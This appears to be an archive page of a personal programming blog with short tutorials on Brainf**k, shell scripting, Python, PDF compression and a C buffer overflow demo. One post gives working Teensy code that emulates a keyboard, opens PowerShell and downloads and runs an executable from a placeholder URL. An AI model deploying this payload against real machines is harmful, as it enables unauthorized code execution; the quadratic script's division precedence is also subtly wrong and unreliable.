Labels

Arduino (1) Brainf**k (1) Bugs (3) C (1) HTML (1) Install (3) Linux (27) Maths (1) Python (12) Raspberry Pi (4)

Friday, 14 July 2017

Programming in Brainf**k


Brainf**k is a minimalistic programming language that consists of 8 commands and a instruction pointer. It is known as a esoteric programming language as it isn't intended for practical use but more as a joke.

The 8 commands are:
+: Increment the current cell by one
-: Decrement the current cell by one
.: Print the ASCII value of the current cell
,: Read a input character into the current cell
[: Skips to corresponding ] if the current cell is 0
]: Skips to the corresponding [ if the current cell is not 0
<: Moves the instruction pointer 1 back
>: Moves the instruction pointer 1 forward

Example program:
We are going to print the letter "A" which has a value of 65 is ASCII. This can be done two ways.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.
This increments the current cell 65 times and then prints the ASCII value of the current cell
As you can probably see this isn't a very good way to achieve this.

Python representative code:
cell1=65
print(chr(cell1))

We are going to use a loop to increment it to 65.
++++++++
[
>++++++++
<->+
.
Line 1: Increment the first cell to 8
Line 2: Check if the value of the current cell is 0, if true skip to ] otherwise go to the next instruction
Line 3: Move the instruction pointer 1 forward and increment it to 8.
Line 4: Move the instruction pointer 1 backward and decrement it by 1.
Line 5: Check if the value of the current cell is 0, if true move to next instruction otherwise skip back to [
Line 6: Move the instruction pointer 1 forward and increment it by 1
Line 7: Print the ASCII value of the current cell

Python representative code:
cell1=8
while(cell1 != 0):
    cell2 = cell2 + 8
    cell1 = cell1 - 1
cell2 = cell2 + 1
print(chr(cell2))

Thursday, 22 June 2017

How to add a user to the sudo group


Sometimes you need to be able to run commands or programs with elevated privileges, to do this the user needs to be in the sudo group.

To add them to the group run the following command as root or with a account with sudo access:
sudo usermod -aG sudo "username"
They should now be able to run commands with elevated privileges.

Monday, 29 May 2017

Command line parameters in shell scripts


Command line parameters are a way to pass information into a program or script in order for it to do what you want it to. Some examples of command line parameters:

ls -l
cat textfile
The command line parameters here are the "-l" and "textfile"

How are command line parameters accessed within a shell script?
They are stored in these variables:
"$0":This holds the name of the command.
"$1":This holds the first parameter.
"$2":This holds the second parameter.
"$3":This holds the third parameter and the pattern repeats.
"$#":This holds the number of parameters that have been passed.
"$@":This holds all of the parameters

Lets make a simple script call it parameters.sh:
#!/bin/sh
echo "Name of script:$0"
echo "First parameter:$1"
echo "Second parameter:$2"
echo "Number of parameters:$#"
echo "All parameters:$@"
When we run the script you should get the following output
Input: 
sh parameters.sh hello world
Output:
Name of script:parameters.sh
First parameter:hello
Second parameter:world
Number of parameters:2
All parameters:hello world



How to format code within web pages


When displaying code within web pages it can be hard to read if it hasn't been separated from the other text and images on the page. To get around this problem I use the google code-prettify JavaScript.
This allows code to be displayed like this:
#!/bin/sh
echo "Hello, World!"

To implement this within your HTML you need to add the following lines of HTML:
At the start of your page:

<script src="https://cdn.rawgit.com/google/code-prettify
/master/loader/run_prettify.js"></script><script>

Then whenever you want to display code:

<pre class="prettyprint">
#!/bin/sh
echo "Hello, World!"
</pre>

Wednesday, 15 March 2017

Python Quadratic Formula


A equation with the form ax^2+bx+c=0 is known as a quadratic equation. When plotted on a graph it will take the general shape of the graph seen below. The points at which the quadratic graph crosses the x-axis are known as the solutions of the quadratic equation.















For this example the quadratic crosses the x-axis when x=3 and when x=-1.

The quadratic formula is used to find the values that satisfy the equation.
Quadratic Formula






I wrote a python script which can find the solutions of these quadratics by using the quadratic formula.

import math
print "ax^2+bx+c=0"

a = float(raw_input("Please enter the value of a: "))
b = float(raw_input("Please enter the value of b: "))
c = float(raw_input("Please enter the value of c: "))

try:
  x1 = (-b + math.pow((math.pow(b,2)-(4*a*c)),0.5)) / 2*a
  x2 = (-b - math.pow((math.pow(b,2)-(4*a*c)),0.5)) / 2*a
except ValueError:
  print "No real solutions"
  exit()

print  "X solutions: ", x1, ",",x2

The Quadratic formula has been wrapped in a try statement to prevent the program from crashing if a quadratic equation with no real solutions is entered. This would cause a crash as you would be trying to find the square root of a negative number which is not possible.

Wednesday, 22 February 2017

Check root at start of script


Some scripts need to be run as root and you may want to check at the start of that script that it is running as root. This can be done by checking the environment variable $EUID. This variable will hold the value 0 if it's being run as root.
#!/bin/bash
if [ "$EUID" -ne 0 ];then
    echo "Please run this script as root"
    exit 1
fi

Tuesday, 20 December 2016

HID keyboard attacks on Windows with a Teensy 3.1

The Teensy 3.1 is a small USB development board similar to Arduino and can be programmed using the Arduino ide. The Teensy board has the ability to act as a USB HID device like a keyboard or mouse and this is what allows us to exploit most computers as most computers have no security when it comes to keyboards or mice.

Things we will be doing:
  • Install the Arduino ide
  • Install the Teensy libraries
  • Setting up the Teensy
  • Programming the Teensy to run code on the test PC

Installing the Arduino ide:
Download the version of Arduino you need whether it be Linux or Windows.
Windows:
Download the windows installer and run the .exe file. The setup should be relatively easy to follow.

Linux:
Download the Arduino archive.
To extract the archive use the command:
tar xf filename.tar.xz


Then run the script install.sh using the command:
sudo sh install.sh
Make sure you note down where you install Arduino as we need this is the next step.


Installing the Teensy libraries:
Download the version of teensyduino that you need whether it be Linux or Windows.
Download the udev rules file if you are on linux.
Linux:
To add the udev rules run the command:
sudo cp 49-teensy.rules /etc/udev/rules.d/
Now run the executable that we downloaded before and follow the steps.

Setting up the Teensy:
We need to set the Arduino IDE board to Teensy 3.1/3.2. This can be done by going to tools, board, Teensy 3.1/3.2. We also need to change the USB type to Keyboard. This can be done by going to tools, USB Type, Keyboard.




















Programming the Teensy:
Go and check out the documentation provided by pjrc here for emulating a keyboard with the Teensy.

Before we actually start programming the Teensy we need to plan out what we will be doing.
Steps:
  1. Open powershell
  2. Download and run the executable
  3. Close the window
Step 1(Open powershell):
We need to open powershell which can be done by pressing the keys:
WINDOWS_KEY + R
"powershell"
ENTER
Note that we will need delays within this code so you may have to play around with the size of these as a slow computer will need a longer delay.
int smalldelay = 500;
int largedelay = 5000;
void setup() {} //So far no setup is needed
void send_keys(){ //Reduce repitition in code
    Keyboard.send_now();  //Send current keys
    Keyboard.set_modifier(0);  //Set modifier to no key
    Keyboard.set_key1(0);  //Set key1 to no key
    Keyboard.set_key2(0);  //Set key2 to no key
    Keyboard.send_now();   //Send the blank keys
}
void press_enter(){ //Reduce repititon in code
    Keyboard.set_key1(KEY_ENTER);  //Set key to enter key
    send_keys();  //Call send_keys function to send the key then clear
}
void loop() { 
    delay(10000); //Delay for 10 seconds for time to upload code
    Keyboard.set_modifier(MODIFIERKEY_GUI);  //Set modifier to the windows key
    Keyboard.set_key1(KEY_R);  //Set key1 to the key "r"
    send_keys();  //Call send_keys function
    delay(smalldelay);  //Delay to allow windows run box to open
    Keyboard.print("powershell");  //Type the line "powershell"
    press_enter();  //Call press_enter function to press the enter key
    delay(largedelay);  //Delay to allow powershell to open
    Keyboard.print("dir");  //Type "dir" to the powershell
    press_enter();  //Call the press_enter function to press the enter key
    delay(50000);  //Delay for 50 seconds before looping again
}

This code will powershell and run the command dir(We can remove this later as its only used
as an example).
Note the 10 second delay at the start of the loop is needed otherwise the Teensy will
start to overwrite your code when plugged in.

Step 2 and 3:
To download the executable that we will be running we need to run the following powershell commands:
$client = new-object System.Net.WebClient
$client.DownloadFile("http://127.0.0.1/a.exe","$env:TEMP\a.exe")
start $env:Temp\a.exe
exit

We need to add the following lines of code after the last enter press
Keyboard.print("$client = New-Object System.Net.WebClient");
press_enter();
delay(smalldelay);
Keyboard.print("$client.DownloadFile(\"http://127.0.0.1/a.exe\",
\"$env:TEMP\\a.exe\") ; start $env:TEMP\\a.exe ; exit");
press_enter();
This will now download a file from wherever you point it at and run the file, it then closes the window.
Note the backslashed before the double quotes is to prevent them from closing the string.

You will most likely have to change the delays within the code as some systems can take a fair amount of time to open powershell which is one of the limitations of the attack.

Tuesday, 13 December 2016

How to send emails in Python

We are going to be using the yagmail library to send a email using python.

To start of we will need to install the yagmail python library.
pip install yagmail

If you don't have pip installed you can install using the following commands depending on your OS.

Debian systems:
sudo apt-get install python-pip

RedHat/Fedora
sudo yum upgrade python-setuptools
sudo yum install python-pip python-wheel


Arch Linux:
sudo pacman -s python2-pip

openSUSE:
sudo zypper install python-pip python-setuptools python-wheel

Now we will test that the library has been installed with a simple python script.

#!/usr/bin/python
import yagmail


Run this script and if it produces no errors you are good to go.

Now we can get started sending emails.

First we need to import the necessary libraries(yagmail, time).
import yagmail
import time


Now lets setup the variables that are going to be sent in the email
subject = "Sent from Python at " + time.strftime("%D:%M:%Y")
message = "Hello, World!"
sender_email = "YOUR_EMAIL"
sender_password = "YOUR_PASSWORD"
recipient_email = "RECIPIENT_EMAIL"


Now lets send the email
yag = yagmail.SMTP(sender_email, sender_password)
yag.send(recipient_email, subject, message)


Putting all of that together we get:
import yagmail
import time

subject = "Sent from Python at " + time.strftime("%D:%M:%Y")
message = "Hello, World!"
sender_email = "YOUR_EMAIL"
sender_password = "YOUR_PASSWORD"
recipient_email = "RECIPIENT_EMAIL"

yag = yagmail.SMTP(sender_email, sender_password)
yag.send(recipient_email, subject, message)


If we run this script you should have a sent a email using less than 10 lines of python.

Link to yagmail GitHub

Saturday, 10 December 2016

Buffer Overflow Variable writing in C



Buffer overflows usually stem from code that has been badly written and not included the necessary checks to prevent them.



Vulnerable code:
#include
int main(){
        char buffer[5];
        char a[2];
        char b[2];
        printf("Enter a string: ");
        gets(buffer);
        printf("Contents of buffer:%s\n",buffer);
        printf("Contents of a:%c\n",a);
        printf("Contents of b:%c\n",b);
}
To compile this code use this command
gcc bufferOverflow.c -fno-stack-protector
Now lets try inputting 5 characters:
Enter a string:aaaaa
Contents of buffer:aaaaa
Contents of a:
Contents of b:
At the moment it is running well without any errors and not overflowing into the variables a and b, this is because we are not exceeding the size of the buffbuffer overflower.

Lets increase it to 6:
Enter a string:aaaaa
Contents of buffer:aaaaa
Contents of a:
Contents of b:
a and b are still empty.

After some trial and error I managed to write into the variable b using 15 characters.
Enter a string: aaaaaaaaaaaaaaa
Contents of buffer:aaaaaaaaaaaaaaa
Contents of a:
Contents of b:a
Using 16 characters I have managed to indirectly write into the memory which holds the values of a and b.

If you input more characters at some point you will cause a segmentation fault as the program is trying to access memory that it doesn't have access to.
Enter a string: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Contents of buffer:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Contents of a:a
Contents of b:a
Segmentation fault (core dumped)
To fix the code we need to change the gets function to fgets.
#include
int main(){
        char buffer[5];
        char a;
        char b;
        printf("Enter a string: ");
        fgets(buffer, sizeof(buffer), stdin);
        printf("Contents of buffer:%s\n",buffer);
        printf("Contents of a:%c\n",a);
        printf("Contents of b:%c\n",b);
}
Now no matter what we enter to the program it will never write more characters than the size of the buffer to the buffer.
Enter a string: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Contents of buffer:aaaa
Contents of a:
Contents of b:
Only 4 characters are printed as fgets includes the newline character at the end of the input.

Friday, 9 December 2016

Shrink a PDF on linux

You can shrink a pdf using this command:


ps2pdf -dPDFSETTINGS=/"OPTION" BiggerPdf.pdf SmallerPDF.pdf


To change the amount of compression change "Option" to:
screen - Low quality
ebook - Med quality
printer - High quality